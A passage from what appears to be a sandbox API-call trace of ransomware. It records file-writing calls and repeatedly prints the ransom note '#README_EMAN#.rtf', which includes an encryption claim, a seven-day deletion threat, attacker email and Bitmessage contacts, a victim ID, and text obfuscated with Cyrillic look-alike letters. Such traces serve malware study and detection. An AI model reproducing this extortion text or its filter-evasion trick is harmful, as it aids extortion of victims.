\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.700] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.700] CloseHandle (hObject=0x27c) returned 1 [0298.701] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\#readme_eman#.rtf")) returned 0xffffffff [0298.701] GetLastError () returned 0x2 [0298.701] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 